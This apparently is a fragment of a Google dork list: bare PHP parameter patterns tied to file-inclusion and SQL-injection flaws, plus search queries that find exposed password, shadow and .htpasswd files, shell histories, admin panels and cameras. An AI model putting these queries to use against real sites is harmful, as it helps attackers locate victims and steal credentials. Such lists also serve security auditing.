head.php?module=
head.php?numero=
head.php?oldal=
head.php?opcion=
head.php?pag=
head.php?pageweb=
head.php?play=
head.php?pname=
head.php?pollname=
head.php?read=
head.php?ref=
head.php?rub=
head.php?sec=
head.php?sekce=
head.php?sivu=
head.php?start=
head.php?str=
head.php?strona=
head.php?tipo=
head.php?viewpage=
head.php?where=
head.php?y=
help.php?CartId=
help.php?css_path=
help/com_view.html?code=
historialeer.php?num=
HistoryStore/pages/item.php?itemID=
hm/inside.php?id=
home.php?a=
home.php?action=
home.php?addr=
home.php?base_dir=
home.php?basepath=
home.php?body=
home.php?cat=
home.php?category=
home.php?channel=
home.php?chapter=
home.php?choix=
home.php?cmd=
home.php?content=
home.php?disp=
home.php?doshow=
home.php?e=
home.php?ev=
home.php?eval=
home.php?g=
home.php?h=
home.php?id=
home.php?ID=
home.php?in=
home.php?include=
home.php?index=
home.php?ir=
home.php?itemnav=
home.php?k=
home.php?link=
home.php?loader=
home.php?loc=
home.php?menu=
home.php?middle=
home.php?middlePart=
home.php?module=
home.php?my=
home.php?oldal=
home.php?opcion=
home.php?pa=
home.php?page=
home.php?pageweb=
home.php?pagina=
home.php?panel=
home.php?path=
home.php?play=
home.php?pollname=
home.php?pr=
home.php?pre=
home.php?qry=
home.php?read=
home.php?recipe=
home.php?redirect=
home.php?ref=
home.php?rub=
home.php?sec=
home.php?secao=
home.php?section=
home.php?seite=
home.php?sekce=
home.php?showpage=
home.php?sp=
home.php?str=
home.php?thispage=
home.php?tipo=
home.php?w=
home.php?where=
home.php?x=
home.php?z=
homepage.php?sel=
hosting_info.php?id=
ht://Dig htsearch error
html/print.php?sid=
html/scoutnew.php?prodid=
htmlpage.php?id=
htmltonuke.php?filnavn=
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
humor.php?id=
i-know/content.php?page=
ibp.php?ISBN=
ICQ chat logs, please...
idlechat/message.php?id=
ihm.php?p=
IIS 4.0 error messages
IIS web server error messages
IlohaMail"
impex/ImpExData.php?systempath=
inc/cmses/aedating4CMS.php?dir[inc]=
inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep=
inc/cmses/aedatingCMS.php?dir[inc]=
inc/functions.inc.php?config[ppa_root_path]=
inc/header.php/step_one.php?server_inc=
inc/pipe.php?HCL_path=
include.php?*[*]*=
include.php?adresa=
include.php?b=
include.php?basepath=
include.php?channel=
include.php?chapter=
include.php?cmd=
include.php?cont=
include.php?content=
include.php?corpo=
include.php?destino=
include.php?dir=
include.php?eval=
include.php?filepath=
include.php?go=
include.php?goFile=
include.php?goto=
include.php?header=
include.php?in=
include.php?include=
include.php?index=
include.php?ir=
include.php?ki=
include.php?left=
include.php?loader=
include.php?loc=
include.php?mid=
include.php?middle=
include.php?middlePart=
include.php?module=
include.php?my=
include.php?name=
include.php?nivel=
include.php?numero=
include.php?oldal=
include.php?option=
include.php?pag=
include.php?pageweb=
include.php?panel=
include.php?path=
include.php?phpbb_root_path=
include.php?play=
include.php?read=
include.php?redirect=
include.php?ref=
include.php?sec=
include.php?secao=
include.php?seccion=
include.php?second=
include.php?sivu=
include.php?tipo=
include.php?to=
include.php?u=
include.php?url=
include.php?w=
include.php?x=
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=
include/new-visitor
include/new-visitor.inc.php?lvc_include_dir=
include/write.php?dir=
includes/functions.php?phpbb_root_path=
includes/header.php?systempath=
includes/search.php?GlobalSettings[templatesDirectory]=
Index of phpMyAdmin
index of: intext:Gallery in Configuration mode
index_en.php?id=
index_en.php?ref=
index_principal.php?pagina=
index.of passlist
index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=
index.php?=
index.php?a=
index.php?action=
index.php?addr=
index.php?adresa=
index.php?area_id=
index.php?arquivo=
index.php?b=
index.php?base_dir=
index.php?basepath=
index.php?body=
index.php?book=
index.php?c=
index.php?canal=
index.php?cart=
index.php?cartID=
index.php?cat=
index.php?channel=
index.php?chapter=
index.php?cid=
index.php?cmd=
index.php?configFile=
index.php?cont=
index.php?content=
index.php?conteudo=
index.php?cPath=
index.php?dept=
index.php?disp=
index.php?do=
index.php?doc=
index.php?dsp=
index.php?ev=
index.php?file=
index.php?filepath=
index.php?go=
index.php?goto=
index.php?i=
index.php?ID=
index.php?id=
index.php?inc=
index.php?incl=
index.php?include=
index.php?index=
index.php?inhalt=
index.php?j=
index.php?kobr=
index.php?l=
index.php?lang=
index.php?lang=gr&file
index.php?langc=
index.php?Language=
index.php?lg=
index.php?link=
index.php?load=
index.php?Load=
index.php?loc=
index.php?meio.php=
index.php?meio=
index.php?menu=
index.php?menu=deti&page=
index.php?mid=
index.php?middlePart=
index.php?mode=
index.php?modo=
index.php?module=
index.php?modus=
index.php?news=
index.php?nic=
index.php?offs=
index.php?oldal=
index.php?op=
index.php?opcao=
index.php?opcion=
index.php?open=
index.php?openfile=
index.php?option=
index.php?ort=
index.php?p=
index.php?pag=
index.php?page=
index.php?pageid=
index.php?pageId=
index.php?pagename=
index.php?pageurl=
index.php?pagina=
index.php?param=
index.php?path=
index.php?pg_t=
index.php?pg=
index.php?pid=
index.php?pilih=
index.php?place=
index.php?play=
index.php?pname=
index.php?pollname=
index.php?pr=
index.php?pre=
index.php?pref=
index.php?principal=
index.php?r=
index.php?rage=
index.php?recipe=
index.php?RP_PATH=
index.php?screen=
index.php?secao=
index.php?section=
index.php?sekce=
index.php?sel=
index.php?show=
index.php?side=
index.php?site=
index.php?sivu=
index.php?str=
index.php?stranica=
index.php?strona=
index.php?sub=
index.php?sub=index.php?id=index.php?t=
index.php?t=
index.php?template=
index.php?tipo=
index.php?to=
index.php?topic=
index.php?type=
index.php?u=
index.php?u=administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=
index.php?url=
index.php?var=
index.php?visualizar=
index.php?w=
index.php?where=
index.php?x=
index.php?x= index.php?mode=index.php?stranica=
index.php?y=
index.php/en/component/pvm/?view=
index.phpmain.php?x=
index0.php?show=
index1.php?*[*]*=
index1.php?*root*=
index1.php?=
index1.php?abre=
index1.php?action=
index1.php?adresa=
index1.php?b=
index1.php?body=
index1.php?c=
index1.php?chapter=
index1.php?choix=
index1.php?cmd=
index1.php?d=
index1.php?dat=
index1.php?dir=
index1.php?filepath=
index1.php?get=
index1.php?go=
index1.php?goFile=
index1.php?home=
index1.php?incl=
index1.php?itemnav=
index1.php?l=
index1.php?link=
index1.php?load=
index1.php?loc=
index1.php?menu=
index1.php?mod=
index1.php?modo=
index1.php?my=
index1.php?nivel=
index1.php?o=
index1.php?oldal=
index1.php?op=
index1.php?OpenPage=
index1.php?pa=
index1.php?pagina=
index1.php?param=
index1.php?path=
index1.php?pg=
index1.php?pname=
index1.php?pollname=
index1.php?pr=
index1.php?pre=
index1.php?qry=
index1.php?read=
index1.php?recipe=
index1.php?redirect=
index1.php?second=
index1.php?seite=
index1.php?sekce=
index1.php?showpage=
index1.php?site=
index1.php?str=
index1.php?strona=
index1.php?subject=
index1.php?t=
index1.php?texto=
index1.php?tipo=
index1.php?type=
index1.php?url=
index1.php?v=
index1.php?var=
index1.php?x=
index2.php?action=
index2.php?adresa=
index2.php?ascii_seite=
index2.php?base_dir=
index2.php?basepath=
index2.php?category=
index2.php?channel=
index2.php?chapter=
index2.php?choix=
index2.php?cmd=
index2.php?content=
index2.php?corpo=
index2.php?d=
index2.php?DoAction=
index2.php?doshow=
index2.php?e=
index2.php?f=
index2.php?filepath=
index2.php?get=
index2.php?goto=
index2.php?home=
index2.php?ID=
index2.php?in=
index2.php?inc=
index2.php?incl=
index2.php?include=
index2.php?ir=
index2.php?itemnav=
index2.php?ki=
index2.php?left=
index2.php?link=
index2.php?load=
index2.php?loader=
index2.php?loc=
index2.php?module=
index2.php?my=
index2.php?oldal=
index2.php?open=
index2.php?OpenPage=
index2.php?option=
index2.php?p=
index2.php?pa=
index2.php?param=
index2.php?pg=
index2.php?phpbb_root_path=
index2.php?pname=
index2.php?pollname=
index2.php?pre=
index2.php?pref=
index2.php?qry=
index2.php?recipe=
index2.php?redirect=
index2.php?ref=
index2.php?rub=
index2.php?second=
index2.php?section=
index2.php?sekce=
index2.php?showpage=
index2.php?strona=
index2.php?texto=
index2.php?thispage=
index2.php?to=
index2.php?type=
index2.php?u=
index2.php?url_page=
index2.php?var=
index2.php?x=
index3.php?abre=
index3.php?addr=
index3.php?adresa=
index3.php?base_dir=
index3.php?body=
index3.php?channel=
index3.php?chapter=
index3.php?choix=
index3.php?cmd=
index3.php?d=
index3.php?destino=
index3.php?dir=
index3.php?disp=
index3.php?ev=
index3.php?get=
index3.php?go=
index3.php?home=
index3.php?inc=
index3.php?include=
index3.php?index=
index3.php?ir=
index3.php?itemnav=
index3.php?left=
index3.php?link=
index3.php?loader=
index3.php?menue=
index3.php?mid=
index3.php?middle=
index3.php?mod=
index3.php?my=
index3.php?name=
index3.php?nivel=
index3.php?oldal=
index3.php?open=
index3.php?option=
index3.php?p=
index3.php?pag=
index3.php?pageweb=
index3.php?panel=
index3.php?path=
index3.php?phpbb_root_path=
index3.php?pname=
index3.php?pollname=
index3.php?pre=
index3.php?pref=
index3.php?q=
index3.php?read=
index3.php?redirect=
index3.php?ref=
index3.php?rub=
index3.php?secao=
index3.php?secc=
index3.php?seccion=
index3.php?second=
index3.php?sekce=
index3.php?showpage=
index3.php?sivu=
index3.php?sp=
index3.php?start=
index3.php?t=
index3.php?thispage=
index3.php?tipo=
index3.php?type=
index3.php?url=
index3.php?var=
index3.php?x=
index3.php?xlink=
info.php?*[*]*=
info.php?adresa=
info.php?base_dir=
info.php?body=
info.php?c=
info.php?chapter=
info.php?content=
info.php?doshow=
info.php?ev=
info.php?eval=
info.php?f=
info.php?filepath=
info.php?go=
info.php?header=
info.php?home=
info.php?ID=
info.php?in=
info.php?incl=
info.php?ir=
info.php?itemnav=
info.php?j=
info.php?ki=
info.php?l=
info.php?loader=
info.php?menue=
info.php?mid=
info.php?middlePart=
info.php?o=
info.php?oldal=
info.php?op=
info.php?opcion=
info.php?option=
info.php?pageweb=
info.php?pagina=
info.php?param=
info.php?phpbb_root_path=
info.php?pname=
info.php?pref=
info.php?r=
info.php?read=
info.php?recipe=
info.php?redirect=
info.php?ref=
info.php?rub=
info.php?sec=
info.php?secao=
info.php?seccion=
info.php?start=
info.php?strona=
info.php?subject=
info.php?t=
info.php?texto=
info.php?url=
info.php?var=
info.php?xlink=
info.php?z=
install/index.php?lng=../../include/main.inc&G_PATH=
Interior/productlist.php?id=
interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=
Internal Server Error
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"d.aspx?id" || inurl:"d.aspx?id"
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"Error Message : Error loading required libraries."
intext:"EZGuestbook"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Powered By : SE Software Technologies" filetype:php
intext:"powered by Web Wiz Journal"
intext:"Session Start * * * *:*:* *" filetype:log
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Tobias Oetiker" "traffic analysis"
intext:"vbulletin" inurl:admincp
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intext:"Warning: Failed opening" "on line" "include_path"
intext:"Web Wiz Journal"
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php
intext:ViewCVS inurl:Settings.php
intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"500 Internal Server Error" "server at"
intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"admin panel" +"
intitle:"admin panel" +"RedKernel"
intitle:"ADSL Configuration page"
intitle:"AlternC Desktop"
intitle:"Apache Tomcat" "Error Report"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Athens Authentication Point"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"BNBT Tracker Info"
intitle:"Browser Launch Page"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Connection Status" intext:"Current login"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"curriculum vitae" filetype:doc
intitle:"Default PLESK Page"
intitle:"Dell Remote Access Controller"
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
intitle:"Docutek ERes - Admin Login" -edu
intitle:"edna:streaming mp3 server" -forums
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"EverFocus.EDSR.applet"
intitle:"Execution of this s?ri?t not permitted"
intitle:"Execution of this script not permitted"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"FTP root at"
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"inc. vpn 3000 concentrator"
intitle:"Index of..etc" passwd
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index of" .bash_history
intitle:"Index of" .mysql_history
intitle:"Index of" .sh_history
intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c
intitle:"index of" +myd size
intitle:"Index of" cfide
intitle:"Index Of" cookies.txt size
intitle:"index of" etc/shadow
intitle:"index of" htpasswd
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"index of" master.passwd
intitle:"index of" members OR accounts
intitle:"index of" mysql.conf OR mysql_config
intitle:"index of" passwd
intitle:"Index of" passwords modified
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"Index of" pwd.db
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"index of" spwd
intitle:"Index of" spwd.db passwd -pam.conf
intitle:"Index of" upload size parent directory
intitle:"index of" user_carts OR user_cart
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"iVISTA.Main.Page"
intitle:"Joomla - Web Installer"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"live view" intitle:axis
intitle:"Login -
intitle:"Login Forum
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"Microsoft Site Server Analysis"
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"Multimon UPS status page"
intitle:"MvBlog powered"
intitle:"MX Control Console" "If you can't remember"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"network administration" inurl:"nic"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"OfficeConnect Cable/DSL Gateway" intext:"Checking your browser"
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
intitle:"Philex 0.2*" -script -site:freelists.org
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"
intitle:"PhpMyExplorer" inurl:"index.php" -cvs
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"remote assessment" OpenAanval Console
intitle:"Remote Desktop Web Connection"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"Retina Report" "CONFIDENTIAL INFORMATION"
intitle:"Samba Web Administration Tool" intext:"Help Workgroup"
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"start.managing.the.device" remote pbx acc
intitle:"statistics of" "advanced web statistics"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"supervisioncam protocol"
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"SuSE Linux Openexchange Server" "Please activate JavaScript!"
intitle:"switch login" "IBM Fast Ethernet Desktop"
intitle:"SWW link" "Please wait....."
intitle:"sysinfo * " intext:"Generated by Sysinfo * written by The Gamblers."
intitle:"System Statistics" +"System and Network Information Center"
intitle:"teamspeak server-administration
intitle:"Terminal Services Web Connection"
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"twiki" inurl:"TWikiUsers"
intitle:"Under construction" "does not currently have"
intitle:"Uploader - Uploader v6" -pixloads.com
intitle:"urchin (5|3|admin)" ext:cgi
intitle:"Usage Statistics for" "Generated by Webalizer"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"wbem" compaq login "Compaq Information Technologies Group"
intitle:"Web Server Statistics for ****"
intitle:"web server status" SSH Telnet
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to F-Secure Policy Manager Server Welcome Page"
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"Welcome to the Advanced Extranet Server, ADVX!"
intitle:"Welcome to Windows 2000 Internet Services"
intitle:"welcome.to.squeezebox"
intitle:"WJ-NT104 Main Page"
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:admin intitle:login
intitle:asterisk.management.portal web-access
intitle:axis intitle:"video server"
intitle:Bookmarks inurl:bookmarks.html "Bookmarks
intitle:Configuration.File inurl:softcart.exe
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
intitle:ilohamail intext:"Version 0.8.10" "
intitle:IMP inurl:imp/index.php3
intitle:index.of "Apache" "server at"
intitle:index.of administrators.pwd
intitle:index.of cgiirc.config
intitle:index.of cleanup.log
intitle:index.of dead.letter
intitle:Index.of etc shadow
intitle:Index.of etc shadow site:passwd
intitle:index.of inbox
intitle:index.of inbox dbx
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:index.of master.passwd
intitle:index.of passwd passwd.bak
intitle:index.of people.lst
intitle:index.of trillian.ini
intitle:index.of ws_ftp.ini
intitle:intranet inurl:intranet +intext:"phone"
intitle:liveapplet
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
intitle:osCommerce inurl:admin intext:"redistributable under the GNU" intext:"Online Catalog" -demo -site:oscommerce.com
intitle:Ovislink inurl:private/login
intitle:phpMyAdmin "Welcome to phpMyAdmin ***" "running on * as root@*"
intitle:phpnews.login
intitle:plesk inurl:login.php3
intitle:rapidshare intext:login
inurl::2082/frontend -demo
inurl:":10000" intext:webmin
inurl:"/admin/configuration. php?" Mystore
inurl:"/axs/ax-admin.pl" -s?ri?t
inurl:"/axs/ax-admin.pl" -script
inurl:"/catalog.nsf" intitle:catalog
inurl:"/cricket/grapher.cgi"
inurl:"/NSearch/AdminServlet"
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:"8003/Display?what="
inurl:"Activex/default.htm" "Demo"
inurl:"auth_user_file.txt"
inurl:"bookmark.htm"
inurl:"cacti" +inurl:"graph_view.php" +"Settings Tree View" -cvs -RPM
inurl:"calendar.asp?action=login"
inurl:"calendars?ri?t/users.txt"
inurl:"default/login.php" intitle:"kerio"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"gs/adminlogin.aspx"
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: require()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"index.php? module=ew_filemanager"
inurl:"install/install.php"
inurl:"map.asp?" intitle:"WhatsUp Gold"
inurl:"newsletter/admin/"
inurl:"newsletter/admin/" intitle:"newsletter admin"
inurl:"NmConsole/Login.asp" | intitle:"Login - Ipswitch WhatsUp Professional 2005" | intext:"Ipswitch WhatsUp Professional 2005 (SP1)" "Ipswitch, Inc"
inurl:"php121login.php"
inurl:"printer/main.html" intext:"settings"
inurl:"putty.reg"
inurl:"Sites.dat"+"PASS="
inurl:"sitescope.html" intitle:"sitescope" intext:"refresh" -demo
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"smb.conf" intext:"workgroup" filetype:conf conf
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"ViewerFrame?Mode="
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp
inurl:"wvdial.conf" intext:"password"
inurl:"wwwroot/
inurl:*db filetype:mdb
inurl:/_layouts/settings
inurl:/*.php?id=
inurl:/adm-cfgedit.php
inurl:/admin/login.asp
inurl:/articles.php?id=
inurl:/calendar.php?token=
inurl:/careers-detail.asp?id=
inurl:/cgi-bin/finger? "In real life"
inurl:/cgi-bin/finger? Enter (account|host|user|username)
inurl:/cgi-bin/pass.txt
inurl:/cgi-bin/sqwebmail?noframes=1
inurl:/Citrix/Nfuse17/
inurl:/CollectionContent.asp?id=
inurl:/commodities.php?*id=
inurl:/Content.asp?id=
inurl:/counter/index.php intitle:"+PHPCounter 7.*"
inurl:/dana-na/auth/welcome.html
inurl:/db/main.mdb
inurl:/default.php?id=
inurl:/default.php?portalID=
inurl:/Details.asp?id=
inurl:/details.php?linkid=
inurl:/dosearch.asp?
inurl:/eprise/
inurl:/eventdetails.php?*=
inurl:/filedown.php?file=
inurl:/gallery.asp?cid=
inurl:/games.php?id= "Powered by PHPD Game Edition"
inurl:/gmap.php?id=
inurl:/imprimir.php?id=
inurl:/include/footer.inc.php?_AMLconfig[cfg_serverpath]=
inurl:/index.php?pgId=
inurl:/index.php?PID= "Powered By Dew-NewPHPLinks v.2.1b"
inurl:/list_blogs.php?sort_mode=
inurl:/Merchant2/admin.mv | inurl:/Merchant2/admin.mvc | intitle:"Miva Merchant Administration Login" -inurl:cheap-malboro.net
inurl:/modcp/ intext:Moderator+vBulletin
inurl:/mpfn=pdview&id=
inurl:/news.php?include=
inurl:/notizia.php?idArt=
inurl:/os_view_full.php?
inurl:/prodotti.php?id=
inurl:/publications.asp?type=
inurl:/recipe-view.php?id=
inurl:/reservations.php?id=
inurl:/shared/help.php?page=
inurl:/squirrelcart/cart_content.php?cart_isp_root=
inurl:/SUSAdmin intitle:"Microsoft Software upd?t? Services"
inurl:/SUSAdmin intitle:"Microsoft Software Update Services"
inurl:/view/lang/index.php?page=?page=
inurl:/viewfaqs.php?cat=
inurl:/webedit.* intext:WebEdit Professional -html
inurl:/WhatNew.asp?page=&id=
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:1810 "Oracle Enterprise Manager"
inurl:2000 intitle:RemotelyAnywhere -site:realvnc.com
inurl:aboutbook.php?id=
inurl:access
inurl:act=
inurl:action=
inurl:admin filetype:db
inurl:admin filetype:xls
inurl:admin intitle:login
inurl:administrator "welcome to mambo"
inurl:ages.php?id=
inurl:ajax.php?page=
inurl:announce.php?id=
inurl:aol*/_do/rss_popup?blogID=
inurl:API_HOME_DIR=
inurl:art.php?idm=
inurl:article.php?ID=
inurl:article.php?id=
inurl:artikelinfo.php?id=
inurl:asp
inurl:avd_start.php?avd=
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:backup filetype:mdb
inurl:band_info.php?id=
inurl:bin.welcome.sh | inurl:bin.welcome.bat | intitle:eHealth.5.0
inurl:board=
inurl:build.err
inurl:buy
inurl:buy.php?category=
inurl:cat=
inurl:category.php?id=
inurl:ccbill filetype:log
inurl:cgi
inurl:cgi-bin inurl:calendar.cfg
inurl:cgi-bin/printenv
inurl:cgi-bin/testcgi.exe "Please distribute TestCGI"
inurl:cgi-bin/ultimatebb.cgi?ubb=login
inurl:cgiirc.config
inurl:changepassword.asp
inurl:channel_id=
inurl:chap-secrets -cvs
inurl:chappies.php?id=
inurl:Citrix/MetaFrame/default/default.aspx
inurl:clanek.php4?id=
inurl:client_id=
inurl:clubpage.php?id=
inurl:cmd=
inurl:collectionitem.php?id=
inurl:communique_detail.php?id=
inurl:config.php dbuname dbpass
inurl:confixx inurl:login|anmeldung
inurl:cont=
inurl:coranto.cgi intitle:Login (Authorized Users Only)
inurl:CrazyWWWBoard.cgi intext:"detailed debugging information"
inurl:csCreatePro.cgi
inurl:current_frame=
inurl:curriculum.php?id=
inurl:data
inurl:date=
inurl:declaration_more.php?decl_id=
inurl:default.asp intitle:"WebCommander"
inurl:detail.php?ID=
inurl:detail=
inurl:dir=
inurl:display=
inurl:download
inurl:download.php?id=
inurl:download=
inurl:downloads_info.php?id=
inurl:ds.py
inurl:email filetype:mdb
inurl:event.php?id=
inurl:exchweb/bin/auth/owalogon.asp
inurl:f=
inurl:faq2.php?id=
inurl:fcgi-bin/echo
inurl:fellows.php?id=
inurl:fiche_spectacle.php?id=
inurl:file
inurl:file=
inurl:fileinclude=
inurl:filename=
inurl:filezilla.xml -cvs
inurl:firm_id=
inurl:footer.inc.php
inurl:forum
inurl:forum filetype:mdb
inurl:forum_bds.php?num=
inurl:forward filetype:forward -cvs
inurl:g=
inurl:galeri_info.php?l=
inurl:gallery.php?id=
inurl:game.php?id=
inurl:games.php?id=
inurl:getdata=
inurl:getmsg.html intitle:hotmail
inurl:gnatsweb.pl
inurl:go=
inurl:historialeer.php?num=
inurl:home
inurl:home.php?pagina=
inurl:hosting_info.php?id=
inurl:hp/device/this.LCDispatcher
inurl:HT=
inurl:html
